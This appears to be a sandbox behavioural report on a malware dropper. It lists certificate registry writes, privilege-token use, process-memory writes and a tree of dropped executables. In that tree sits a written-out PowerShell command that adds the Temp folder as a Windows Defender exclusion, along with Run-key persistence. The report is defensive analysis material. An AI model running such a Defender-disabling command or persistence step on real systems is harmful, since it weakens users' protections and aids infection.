Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 5c000000010000000400000000080000190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc36200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	installer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5104	powershell.exe
5104	powershell.exe
5104	powershell.exe
4672	WerFault.exe
4672	WerFault.exe
2580	WerFault.exe
2580	WerFault.exe
4556	WerFault.exe
4556	WerFault.exe
5908	WerFault.exe
5908	WerFault.exe
5304	msedge.exe
5304	msedge.exe
3948	WerFault.exe
3948	WerFault.exe
1284	WerFault.exe
1284	WerFault.exe
5892	setup_2.tmp
5892	setup_2.tmp
2348	WerFault.exe
2348	WerFault.exe
5508	WerFault.exe
5508	WerFault.exe
4164	5310996.exe
4164	5310996.exe
5388	ultramediaburner.tmp
5388	ultramediaburner.tmp
888	WerFault.exe
888	WerFault.exe
3080	Chrome 5.exe
3080	Chrome 5.exe
4100	Gaemotiqucu.exe
4100	Gaemotiqucu.exe
4100	Gaemotiqucu.exe
4100	Gaemotiqucu.exe
4100	Gaemotiqucu.exe
4100	Gaemotiqucu.exe
4100	Gaemotiqucu.exe
4100	Gaemotiqucu.exe
4100	Gaemotiqucu.exe
4100	Gaemotiqucu.exe
4100	Gaemotiqucu.exe
4100	Gaemotiqucu.exe
4100	Gaemotiqucu.exe
4100	Gaemotiqucu.exe
4100	Gaemotiqucu.exe
4100	Gaemotiqucu.exe
4100	Gaemotiqucu.exe
4100	Gaemotiqucu.exe
4100	Gaemotiqucu.exe
4100	Gaemotiqucu.exe
4100	Gaemotiqucu.exe
4100	Gaemotiqucu.exe
4100	Gaemotiqucu.exe
4100	Gaemotiqucu.exe
4100	Gaemotiqucu.exe
4100	Gaemotiqucu.exe
4100	Gaemotiqucu.exe
4100	Gaemotiqucu.exe
4100	Gaemotiqucu.exe
4100	Gaemotiqucu.exe
4100	Gaemotiqucu.exe
4100	Gaemotiqucu.exe
4100	Gaemotiqucu.exe

Suspicious behavior: SetClipboardViewer 1 IoCs

pid	Process
4560	WinHoster.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeCreateTokenPrivilege	4536	Tue118f55232e4.exe
Token: SeAssignPrimaryTokenPrivilege	4536	Tue118f55232e4.exe
Token: SeLockMemoryPrivilege	4536	Tue118f55232e4.exe
Token: SeIncreaseQuotaPrivilege	4536	Tue118f55232e4.exe
Token: SeMachineAccountPrivilege	4536	Tue118f55232e4.exe
Token: SeTcbPrivilege	4536	Tue118f55232e4.exe
Token: SeSecurityPrivilege	4536	Tue118f55232e4.exe
Token: SeTakeOwnershipPrivilege	4536	Tue118f55232e4.exe
Token: SeLoadDriverPrivilege	4536	Tue118f55232e4.exe
Token: SeSystemProfilePrivilege	4536	Tue118f55232e4.exe
Token: SeSystemtimePrivilege	4536	Tue118f55232e4.exe
Token: SeProfSingleProcessPrivilege	4536	Tue118f55232e4.exe
Token: SeIncBasePriorityPrivilege	4536	Tue118f55232e4.exe
Token: SeCreatePagefilePrivilege	4536	Tue118f55232e4.exe
Token: SeCreatePermanentPrivilege	4536	Tue118f55232e4.exe
Token: SeBackupPrivilege	4536	Tue118f55232e4.exe
Token: SeRestorePrivilege	4536	Tue118f55232e4.exe
Token: SeShutdownPrivilege	4536	Tue118f55232e4.exe
Token: SeDebugPrivilege	4536	Tue118f55232e4.exe
Token: SeAuditPrivilege	4536	Tue118f55232e4.exe
Token: SeSystemEnvironmentPrivilege	4536	Tue118f55232e4.exe
Token: SeChangeNotifyPrivilege	4536	Tue118f55232e4.exe
Token: SeRemoteShutdownPrivilege	4536	Tue118f55232e4.exe
Token: SeUndockPrivilege	4536	Tue118f55232e4.exe
Token: SeSyncAgentPrivilege	4536	Tue118f55232e4.exe
Token: SeEnableDelegationPrivilege	4536	Tue118f55232e4.exe
Token: SeManageVolumePrivilege	4536	Tue118f55232e4.exe
Token: SeImpersonatePrivilege	4536	Tue118f55232e4.exe
Token: SeCreateGlobalPrivilege	4536	Tue118f55232e4.exe
Token: 31	4536	Tue118f55232e4.exe
Token: 32	4536	Tue118f55232e4.exe
Token: 33	4536	Tue118f55232e4.exe
Token: 34	4536	Tue118f55232e4.exe
Token: 35	4536	Tue118f55232e4.exe
Token: SeDebugPrivilege	5116	Tue11f251db82fb7b.exe
Token: SeDebugPrivilege	4680	Tue11141271fbe5877f.exe
Token: SeDebugPrivilege	5104	powershell.exe
Token: SeRestorePrivilege	4672	WerFault.exe
Token: SeBackupPrivilege	4672	WerFault.exe
Token: SeBackupPrivilege	4672	WerFault.exe
Token: SeRestorePrivilege	4556	WerFault.exe
Token: SeBackupPrivilege	4556	WerFault.exe
Token: SeBackupPrivilege	4556	WerFault.exe
Token: SeDebugPrivilege	5176	PublicDwlBrowser1100.exe
Token: SeDebugPrivilege	5296	2.exe
Token: SeDebugPrivilege	5952	msedge.exe
Token: SeDebugPrivilege	4164	5310996.exe
Token: SeDebugPrivilege	3956	taskkill.exe
Token: SeDebugPrivilege	2468	46807GHF____.exe
Token: SeIncreaseQuotaPrivilege	5104	powershell.exe
Token: SeSecurityPrivilege	5104	powershell.exe
Token: SeTakeOwnershipPrivilege	5104	powershell.exe
Token: SeLoadDriverPrivilege	5104	powershell.exe
Token: SeSystemProfilePrivilege	5104	powershell.exe
Token: SeSystemtimePrivilege	5104	powershell.exe
Token: SeProfSingleProcessPrivilege	5104	powershell.exe
Token: SeIncBasePriorityPrivilege	5104	powershell.exe
Token: SeCreatePagefilePrivilege	5104	powershell.exe
Token: SeBackupPrivilege	5104	powershell.exe
Token: SeRestorePrivilege	5104	powershell.exe
Token: SeShutdownPrivilege	5104	powershell.exe
Token: SeDebugPrivilege	5104	powershell.exe
Token: SeSystemEnvironmentPrivilege	5104	powershell.exe
Token: SeRemoteShutdownPrivilege	5104	powershell.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
5892	setup_2.tmp
5388	ultramediaburner.tmp
5364	installer.exe
6060	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
440	cmd.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 476 wrote to memory of 5108	476	setup_x86_x64_install.exe	77
PID 476 wrote to memory of 5108	476	setup_x86_x64_install.exe	77
PID 476 wrote to memory of 5108	476	setup_x86_x64_install.exe	77
PID 5108 wrote to memory of 4136	5108	setup_installer.exe	78
PID 5108 wrote to memory of 4136	5108	setup_installer.exe	78
PID 5108 wrote to memory of 4136	5108	setup_installer.exe	78
PID 4136 wrote to memory of 4648	4136	setup_install.exe	83
PID 4136 wrote to memory of 4648	4136	setup_install.exe	83
PID 4136 wrote to memory of 4648	4136	setup_install.exe	83
PID 4136 wrote to memory of 4636	4136	setup_install.exe	84
PID 4136 wrote to memory of 4636	4136	setup_install.exe	84
PID 4136 wrote to memory of 4636	4136	setup_install.exe	84
PID 4136 wrote to memory of 4700	4136	setup_install.exe	85
PID 4136 wrote to memory of 4700	4136	setup_install.exe	85
PID 4136 wrote to memory of 4700	4136	setup_install.exe	85
PID 4136 wrote to memory of 4596	4136	setup_install.exe	86
PID 4136 wrote to memory of 4596	4136	setup_install.exe	86
PID 4136 wrote to memory of 4596	4136	setup_install.exe	86
PID 4136 wrote to memory of 5044	4136	setup_install.exe	87
PID 4136 wrote to memory of 5044	4136	setup_install.exe	87
PID 4136 wrote to memory of 5044	4136	setup_install.exe	87
PID 4136 wrote to memory of 4496	4136	setup_install.exe	88
PID 4136 wrote to memory of 4496	4136	setup_install.exe	88
PID 4136 wrote to memory of 4496	4136	setup_install.exe	88
PID 4136 wrote to memory of 4568	4136	setup_install.exe	89
PID 4136 wrote to memory of 4568	4136	setup_install.exe	89
PID 4136 wrote to memory of 4568	4136	setup_install.exe	89
PID 4136 wrote to memory of 5064	4136	setup_install.exe	90
PID 4136 wrote to memory of 5064	4136	setup_install.exe	90
PID 4136 wrote to memory of 5064	4136	setup_install.exe	90
PID 4136 wrote to memory of 4968	4136	setup_install.exe	98
PID 4136 wrote to memory of 4968	4136	setup_install.exe	98
PID 4136 wrote to memory of 4968	4136	setup_install.exe	98
PID 4636 wrote to memory of 4460	4636	cmd.exe	91
PID 4636 wrote to memory of 4460	4636	cmd.exe	91
PID 4636 wrote to memory of 4460	4636	cmd.exe	91
PID 4568 wrote to memory of 4584	4568	cmd.exe	97
PID 4568 wrote to memory of 4584	4568	cmd.exe	97
PID 4568 wrote to memory of 4584	4568	cmd.exe	97
PID 4596 wrote to memory of 5116	4596	cmd.exe	92
PID 4596 wrote to memory of 5116	4596	cmd.exe	92
PID 4136 wrote to memory of 4348	4136	setup_install.exe	96
PID 4136 wrote to memory of 4348	4136	setup_install.exe	96
PID 4136 wrote to memory of 4348	4136	setup_install.exe	96
PID 4648 wrote to memory of 5104	4648	cmd.exe	94
PID 4648 wrote to memory of 5104	4648	cmd.exe	94
PID 4648 wrote to memory of 5104	4648	cmd.exe	94
PID 5044 wrote to memory of 3928	5044	cmd.exe	93
PID 5044 wrote to memory of 3928	5044	cmd.exe	93
PID 5044 wrote to memory of 3928	5044	cmd.exe	93
PID 4700 wrote to memory of 2236	4700	cmd.exe	95
PID 4700 wrote to memory of 2236	4700	cmd.exe	95
PID 4700 wrote to memory of 2236	4700	cmd.exe	95
PID 4496 wrote to memory of 4552	4496	cmd.exe	103
PID 4496 wrote to memory of 4552	4496	cmd.exe	103
PID 4496 wrote to memory of 4552	4496	cmd.exe	103
PID 5064 wrote to memory of 4680	5064	cmd.exe	100
PID 5064 wrote to memory of 4680	5064	cmd.exe	100
PID 2236 wrote to memory of 724	2236	Tue11b9d76a96506.exe	101
PID 2236 wrote to memory of 724	2236	Tue11b9d76a96506.exe	101
PID 2236 wrote to memory of 724	2236	Tue11b9d76a96506.exe	101
PID 4348 wrote to memory of 1212	4348	cmd.exe	102
PID 4348 wrote to memory of 1212	4348	cmd.exe	102
PID 4348 wrote to memory of 1212	4348	cmd.exe	102

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:476
- C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:5108
- - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\setup_install.exe
    "C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\setup_install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:4136
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4648
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5104
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue11d7385a978cc.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4636
    - - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11d7385a978cc.exe
        
        Tue11d7385a978cc.exe
        5⤵
        Executes dropped EXE
        
        PID:4460
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue11b9d76a96506.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4700
    - - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11b9d76a96506.exe
        
        Tue11b9d76a96506.exe
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2236
      - C:\Users\Admin\AppData\Local\Temp\is-6I48G.tmp\Tue11b9d76a96506.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-6I48G.tmp\Tue11b9d76a96506.tmp" /SL5="$3014A,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11b9d76a96506.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:724
        
        C:\Users\Admin\AppData\Local\Temp\is-NLTKT.tmp\46807GHF____.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-NLTKT.tmp\46807GHF____.exe" /S /UID=burnerch2
        7⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Adds Run key to start application
        Drops file in Program Files directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:2468
        
        C:\Program Files\Internet Explorer\LVIHCMCUZN\ultramediaburner.exe
        
        "C:\Program Files\Internet Explorer\LVIHCMCUZN\ultramediaburner.exe" /VERYSILENT
        8⤵
        Executes dropped EXE
        
        PID:5864
        
        C:\Users\Admin\AppData\Local\Temp\is-262CM.tmp\ultramediaburner.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-262CM.tmp\ultramediaburner.tmp" /SL5="$20318,281924,62464,C:\Program Files\Internet Explorer\LVIHCMCUZN\ultramediaburner.exe" /VERYSILENT
        9⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        
        PID:5388
        
        C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
        
        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
        10⤵
        Executes dropped EXE
        
        PID:852
        
        C:\Users\Admin\AppData\Local\Temp\c4-f0675-bf1-46baa-1ea6361c01c5c\Qyqocizhupi.exe
        
        "C:\Users\Admin\AppData\Local\Temp\c4-f0675-bf1-46baa-1ea6361c01c5c\Qyqocizhupi.exe"
        8⤵
        Executes dropped EXE
        
        PID:5492
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
        9⤵
        Adds Run key to start application
        Enumerates system info in registry
        Suspicious use of FindShellTrayWindow
        
        PID:6060
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8651846f8,0x7ff865184708,0x7ff865184718
        10⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5952
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2060,11030181678787472891,8346480824831003653,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2336 /prefetch:2
        10⤵
        
        PID:4308
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2060,11030181678787472891,8346480824831003653,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2512 /prefetch:8
        10⤵
        
        PID:1504
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2060,11030181678787472891,8346480824831003653,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2504 /prefetch:3
        10⤵
        
        PID:1484
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
